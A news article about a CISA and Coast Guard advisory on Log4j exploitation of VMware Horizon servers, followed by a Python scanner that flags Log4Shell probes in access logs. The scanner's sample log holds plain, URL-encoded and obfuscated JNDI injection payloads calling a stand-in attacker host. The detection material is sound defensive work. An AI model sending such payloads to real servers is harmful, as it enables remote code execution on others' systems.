In mid-December of last year, the Apache Log4j vulnerability emerged, affecting systems that use the Java logging library. The ease with which the flaw could be exploited, and what an attacker gains by doing so, namely remote code execution, attracted many threat actors. Now, almost 8 months later, CISA has had to issue a warning about this vulnerability.
Patch vulnerable products immediately
CISA (the Cybersecurity and Infrastructure Security Agency) and CGCYBER (the United States Coast Guard Cyber Command) have published a joint advisory telling system administrators to update VMware Horizon and Unified Access Gateway servers that run vulnerable Log4j versions. The vulnerability, tracked as CVE-2021-44228, was patched by Apache shortly after it became publicly known.
CISA and CGCYBER recommend all organizations with affected systems that did not immediately apply available patches or workarounds assume compromise and initiate threat hunting activities using the IOCs provided in this CSA, Malware Analysis Report (MAR)-10382580-1, and MAR-10382254-1. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to CISA.
In the advisory, CISA also names the loader malware it found: hmsvc.exe, SvcEdge.exe, odbcads.exe, praiser.exe, fontdrvhosts.exe, and winds.exe. If exploitation is discovered, CISA recommends:
- Immediately isolating affected systems.
- Collecting and reviewing relevant logs, data, and artifacts.
- Considering soliciting support from a third-party incident response organization that can provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.
- Reporting incidents to CISA via CISA’s 24/7 Operations Center.
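The threat hunt the advisory calls for starts with the web and application logs of the affected servers. As an added example that is not part of the article or of CISA's advisory, the following Python scanner flags Log4Shell probe strings in Apache-style access logs, undoing the URL-encoding and nested lookups that hide the literal `${jndi:` from a plain string match; the log lines, IP addresses and the `attacker.example` host are constructed.

```python
import re
from urllib.parse import unquote

# Lookups that Log4j resolves before evaluating the outer ${jndi:...}; probes nest
# them so the literal "jndi" never appears in the raw request.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[a-z]*:[^${}:]*:-([^${}]*)\}", re.IGNORECASE)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo URL-encoding and inner lookups until the text stops changing."""
    for _ in range(max_rounds):
        before = text
        text = unquote(text)
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def is_log4shell_probe(line: str) -> bool:
    return _JNDI.search(normalize(line)) is not None


def scan_log(lines):
    """Return (line_number, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append((n, norm))
    return hits


# Constructed sample: one plain probe, one URL-encoded and nested, one using ${::-x}.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [15/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [15/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [15/Dec/2021:10:01:09 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [15/Dec/2021:10:01:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}"',
    '10.0.0.7 - - [15/Dec/2021:10:02:00 +0000] "GET /login HTTP/1.1" 200 800 "-" "Mozilla/5.0 (Windows NT 10.0)"',
]

if __name__ == "__main__":
    for n, norm in scan_log(SAMPLE_ACCESS_LOG):
        print(f"line {n}: {norm}")
```

A hit only shows that a probe reached the server; whether the lookup was actually evaluated is settled by the outbound LDAP/RMI connection attempts and the Java process activity that follow it, which is why the advisory pairs log review with host artifacts.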